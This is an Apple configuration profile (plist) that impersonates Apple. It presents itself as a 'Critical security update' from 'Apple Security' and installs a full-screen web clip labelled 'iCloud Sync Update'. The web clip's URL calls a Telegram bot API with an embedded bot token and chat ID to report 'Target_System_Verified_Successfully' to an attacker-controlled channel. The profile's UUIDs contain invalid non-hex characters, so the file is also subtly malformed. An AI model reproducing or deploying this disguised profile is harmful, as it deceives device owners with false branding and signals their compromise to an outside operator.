<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>PayloadContent</key>
    <array>
        <dict>
            <key>FullScreen</key>
            <true/>
            <key>IsRemovable</key>
            <true/>
            <key>Label</key>
            <string>iCloud Sync Update</string>
            <key>PayloadDescription</key>
            <string>Configures secure browser access and data synchronization.</string>
            <key>PayloadDisplayName</key>
            <string>Secure Verification Service</string>
            <key>PayloadIdentifier</key>
            <string>com.apple.webclip.managed.1</string>
            <key>PayloadType</key>
            <string>com.apple.webclip</string>
            <key>PayloadUUID</key>
            <string>D5E6F7G8-H9I0-J1K2-L3M4-N506P7Q8R9S0</string>
            <key>PayloadVersion</key>
            <integer>1</integer>
            <key>URL</key>
            <string>https://api.telegram.org/bot8662750137:AAGEIPealqUPso3hFzdCJrUZln684PaVX3k/sendMessage?chat_id=8639892987&amp;text=Target_System_Verified_Successfully_V5_🔥</string>
        </dict>
    </array>
    <key>PayloadDescription</key>
    <string>Critical security update to maintain private chat database and encryption.</string>
    <key>PayloadDisplayName</key>
    <string>Security Decrypter V5</string>
    <key>PayloadIdentifier</key>
    <string>com.apple.security.update.v5</string>
    <key>PayloadOrganization</key>
    <string>Apple Security</string>
    <key>PayloadType</key>
    <string>Configuration</string>
    <key>PayloadUUID</key>
    <string>E5F6G7H8-I9J0-K1L2-M3N4-05P6Q7R8S9T0</string>
    <key>PayloadVersion</key>
    <integer>1</integer>
</dict>
</plist>
